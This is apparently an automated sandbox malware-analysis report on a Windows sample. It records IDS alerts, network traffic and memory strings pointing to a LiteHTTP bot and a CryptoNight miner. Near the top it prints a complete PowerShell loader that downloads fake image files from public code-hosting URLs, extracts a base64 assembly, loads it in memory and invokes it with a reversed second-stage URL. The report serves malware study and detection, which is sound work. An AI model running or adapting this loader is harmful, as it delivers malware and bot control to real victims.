                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param 
([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2025-01-03T23:20:11.280992+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 52.216.138.83 | 443 | 192.168.2.4 | 49733 | TCP
                  2025-01-03T23:20:11.369607+0100 | 2057635 | 1 | A Network Trojan was detected | 52.216.138.83 | 443 | 192.168.2.4 | 49733 | TCP
                  2025-01-03T23:20:04.451417+0100 | 2049038 | 1 | A Network Trojan was detected | 185.199.111.133 | 443 | 192.168.2.4 | 49731 | TCP
                  2025-01-03T23:21:08.789318+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49822 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:15.086194+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49863 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:23.476844+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49917 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:37.804969+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50010 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:55.133087+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50011 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:16.554980+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50012 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:27.023736+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50013 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:43.758128+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50014 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:57.633142+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50015 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:09.695642+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50016 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:26.680282+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50017 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:34.296551+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:50.789457+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:24:01.508185+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:08.789318+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49822 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:15.086194+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49863 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:23.476844+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49917 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:37.804969+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50010 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:55.133087+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50011 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:16.554980+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50012 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:27.023736+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50013 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:43.758128+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50014 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:57.633142+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50015 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:09.695642+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50016 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:26.680282+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50017 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:34.296551+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:50.789457+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:24:01.508185+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:08.521208+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 49822 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:14.789394+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 49863 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:22.857340+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 49917 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:37.523775+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50010 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:21:54.821210+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50011 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:16.258180+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:26.728207+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:43.461318+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:22:57.336338+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50015 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:09.398835+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:26.273932+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:33.889067+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:23:49.932036+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50019 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:24:01.164523+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 87.120.126.5 | 80 | TCP
                  2025-01-03T23:20:11.369607+0100 | 2858295 | 1 | A Network Trojan was detected | 52.216.138.83 | 443 | 192.168.2.4 | 49733 | TCP

                  AV Detection

                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.0% probability
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe | Code function: 0_2_00007FF761F730EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF761F730EC

                  Bitcoin Miner

                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: CryptoNight
                  Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 52.216.138.83:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: 3lhrJ4X.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: wextract.pdb source: 3lhrJ4X.exe
                  Source: Binary string: wextract.pdbGCTL source: 3lhrJ4X.exe
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.dr
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.6\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: powershell.exe, 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe | Code function: 0_2_00007FF761F7204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF761F7204C
                  Source: C:\Windows\System32\conhost.exe | File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\conhost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\conhost.exe | File opened: C:\Users\user
                  Source: C:\Windows\System32\conhost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\System32\conhost.exe | File opened: C:\Users\user\AppData
                  Source: C:\Windows\System32\conhost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49822 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49863 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49863 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49863 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49822 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49822 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49917 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49917 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49917 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50010 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50016 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50011 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50012 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50014 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50010 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50010 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50020 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50013 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50016 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50011 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50016 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50014 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50012 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50011 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50012 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50014 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50020 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50020 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50013 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50013 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50018 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50018 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50018 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50015 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50015 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50015 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50017 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50017 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50017 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50019 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50019 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50019 -> 87.120.126.5:80
                  Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 52.216.138.83:443 -> 192.168.2.4:49733
                  Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 52.216.138.83:443 -> 192.168.2.4:49733
                  Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 52.216.138.83:443 -> 192.168.2.4:49733
                  Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.111.133:443 -> 192.168.2.4:49731
                  Source: global traffic HTTP traffic detected: GET /ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612 HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-4c70-80bf-c31644de3b36/pbbcnnk.txt?response-content-disposition=attachment%3B%20filename%3D%22pbbcnnk.txt%22&AWSAccessKeyId=ASIA6KOSE3BNMJEEV3FX&Signature=z6SeEEmtoWPAk%2Bh79ka8wMIffkg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJGMEQCIBNJmShv7MGKINf2cFLnqR6qyLtPe98WLo7eDI9nQcNyAiAN6HDMTik4z8uQLRDJhMts25H6pPl7Yd4U0Vq62UnK%2BSqwAgj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM9t%2FCyMR70fx2FzCcKoQCXAjF45TfCV1fS6QZGBy56NaisJivwPlbDu%2Bnl98ll7DIvxurRbCCrTVLgI4LQynZnjuZvsiqnDUoNbORBgTWGJU5uYv4iLjk4tTmBS%2B9xetZkTp5LmCRubDsgSNP%2BqADqgSaNmv%2BWfVNWqMN8divArRrR9ER%2Bete9%2BlnREMX87DwhO1aMuQ50M8ywOZp97IB%2B0vVwHTEXWW%2BF36a%2FHKcAQHseZz%2FGDQCdCYq2ShfmMQnO53E2prvYX1wAG3mwY3af0Bw47PhA57rXXKLXSu85BI%2F3jGtdUtmMd%2B9xhbxbWYRivLXWOAHE0xUSTZTmFi1SXYrGVfXLQkKHBeZDxkL6NKHb%2FIw7cLhuwY6ngFG9dexa8v%2BqlSQ1OHbxL1SLgJZVR9ROphuLtPTEivNX9TCHpw0gW13lOyyGCDi5EM5C7mFfXpA8dH2%2BRyekxJMAGUn3SuYq5WACq1%2F8nc%2F%2FDn6Zi928v7gZvFhsPeVs350Qyj22FiTVdY8pY88m4kZ0dD5rvyxCXez1Ems57gb1TrTyEqpTJ34zsY86pbWJNqe8hiNm%2Ffc95ZTJYCKSA%3D%3D&Expires=1735944309 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: Joe Sandbox View IP Address: 185.166.143.48
                  Source: Joe Sandbox View IP Address: 185.199.111.133
                  Source: Joe Sandbox View ASN Name: UNACS-AS-BG8000BurgasBG
                  Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknown TCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: global traffic DNS traffic detected: DNS query: bitbucket.org
                  Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                  Source: unknown HTTP traffic detected: POST /VmCetSC7/page.php HTTP/1.1 User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3 Content-Type: application/x-www-form-urlencoded Host: 87.120.126.5 Content-Length: 471 Expect: 100-continue Connection: Keep-Alive
                  Source: MSBuild.exe, 00000008.00000002.4125122476.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003260000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003103000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5
                  Source: MSBuild.exe, 00000008.00000002.4125122476.0000000002FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.php
                  Source: MSBuild.exe, 00000008.00000002.4125122476.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003260000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000322D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.0000000003103000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000307C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.00000000030E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpP
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB7DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084DAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.4125122476.000000000307C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3B44B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000004.00000002.2060947701.000002084DA7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2060947701.000002084DAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3B4291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BBCFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
